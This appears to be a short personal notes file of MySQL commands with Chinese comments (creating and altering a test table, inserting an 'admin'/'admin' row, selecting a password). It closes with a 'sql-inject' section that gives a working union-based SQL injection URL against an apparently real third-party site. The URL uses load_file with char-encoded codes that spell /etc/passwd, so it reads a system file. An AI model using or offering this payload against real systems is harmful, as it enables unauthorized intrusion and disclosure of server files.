create table test_table(id int primary key,name varchar(15) not null unique,password varchar(16) not null);
# 显示表结构
desc table_name;

# 添加字段
alter table test_table add create_time timestamp not null default current_timestamp;

# 插入
insert into test_table (name,password) values ('admin','admin')

# 修改表结构
alter table test_table change  id id int not null auto_increment;

# select
select password from test_table where name='admin';

# sql-inject
# Ref
http://blog.wegeek.org/index.php/archives/25.html
http://www.cnblogs.com/amwld/archive/2011/08/25/2152723.html



http://www.loveuv.com/kit/my
?type=11
&cmt=
&state=1 union select 1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39
